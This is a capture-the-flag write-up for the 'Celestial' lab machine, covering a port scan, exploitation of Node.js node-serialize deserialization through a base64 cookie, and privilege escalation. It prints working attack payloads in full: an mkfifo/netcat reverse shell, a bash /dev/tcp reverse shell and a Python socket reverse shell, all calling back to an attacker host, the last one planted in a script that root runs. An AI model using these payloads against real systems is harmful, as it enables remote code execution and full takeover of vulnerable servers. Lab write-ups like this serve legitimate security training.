Skip to content

Celestial

Port scan

$ sudo nmap 10.10.10.85 -p- --min-rate=10000 -T4 -sCV

PORT     STATE SERVICE VERSION
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

http://10.10.10.85:3000/

alt text

Base64 decode the cookie profile

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Insecure deserailization in Node.js

Serialization is the process of converting an object into a stream of bytes to store the object or transmit it to memory, a database, or a file. Its main purpose is to save the state of an object in order to be able to recreate it when needed. The reverse process is called deserialization.

Insecure Deserialization in Node.js

serialize.js

var serialize = require('node-serialize');

x = {
test : function(){
  require('child_process').execSync("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f", function puts(error, stdout, stderr) {});
}
};

console.log("Serialized: \n" + serialize.serialize(x));

/*
append () after the function closing bracket
*/

$ python -m venv .venv
$ source ./.venv/bin/active

$ sudo apt-get update

$ sudo apt install nodejs
$ sudo apt install npm
$ npm install node-serialize

$ node serialize.js

{"test":"_$$ND_FUNC$$_function(){\n  require('child_process').execSync(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f\", function puts(error, stdout, stderr) {});\n}"}

{"username":"_$$ND_FUNC$$_function(){\n  require('child_process').execSync(\"bash -c 'bash -i >& /dev/tcp/10.10.16.2/4444 0>&1'\", function puts(error, stdout, stderr) {});\n}()","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

Base64 endcode the data and replace the cookie attribute profile

alt text

User sun

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

$ find / -type f -writable 2>/dev/null | grep -v '^(/proc|/sys|/snap|/boot|/var|/run|/dev|/opt|/etc|/usr/lib|/usr/s?bin|/usr/share/)'

/home/sun/Documents/script.py

alt text

The output.txt is owned by root and its content are from script.py which we can modify it. So modify the script and put a python reverse shell inside.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.2",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

alt text